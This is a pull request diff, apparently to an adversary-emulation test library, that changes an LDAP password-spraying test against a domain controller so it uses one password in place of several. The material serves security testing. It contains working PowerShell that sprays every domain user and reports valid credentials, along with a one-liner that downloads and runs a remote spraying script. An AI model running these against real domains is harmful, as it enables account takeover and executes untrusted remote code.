### PR TITLE
Password spraying with a single password only (less confusing)

### DIFF
--- a/atomics/T1110.003/T1110.003.yaml
+++ b/atomics/T1110.003/T1110.003.yaml
@@ -54,19 +54,19 @@ atomic_tests:
     elevation_required: false
     command: |
       IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1'); Invoke-DomainPasswordSpray -Password Spring2017 -Domain #{domain} -Force
-- name: Password spray all domain users with a couple of passwords via LDAP against domain controller (NTLM or Kerberos)
+- name: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
   auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d
   description: |
-    Attempt to brute force all domain user with a couple of passwords (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
+    Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
 
     Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)
   supported_platforms:
   - windows
   input_arguments:
-    passwords:
-      description: list of passwords we will attempt to brute force with (not too many, else it's more a bruteforce than a password spraying)
+    password:
+      description: single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001)
       type: String
-      default: 123456`npassword
+      default: P@ssw0rd!
     domain:
       description: Domain FQDN
       type: String
@@ -89,20 +89,19 @@ atomic_tests:
       [System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
       $di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("#{domain}",389)
 
-      $passwords = "#{passwords}".split("{`n}")
       $DomainUsers | Foreach-Object {
         $user = $_
-        foreach ($password in $passwords){
-          $credz = new-object System.Net.NetworkCredential($user, $password, "#{domain}")
-          $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})
-          try {
-            Write-Host " [-] Attempting ${password} on account ${user}."
-            $conn.bind()
-            # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
-            Write-Host " [!] ${user}:${password} are valid credentials!"
-          } catch {
-            Write-Host $_.Exception.Message
-          }
+        $password = "#{password}"
+
+        $credz = new-object System.Net.NetworkCredential($user, $password, "#{domain}")
+        $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::#{auth})
+        try {
+          Write-Host " [-] Attempting ${password} on account ${user}."
+          $conn.bind()
+          # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
+          Write-Host " [!] ${user}:${password} are valid credentials!"
+        } catch {
+          Write-Host $_.Exception.Message
         }
       }
       Write-Host "End of password spraying"


### PR DESCRIPTION
Allowing multiple passwords, even just two by default, is still confusing.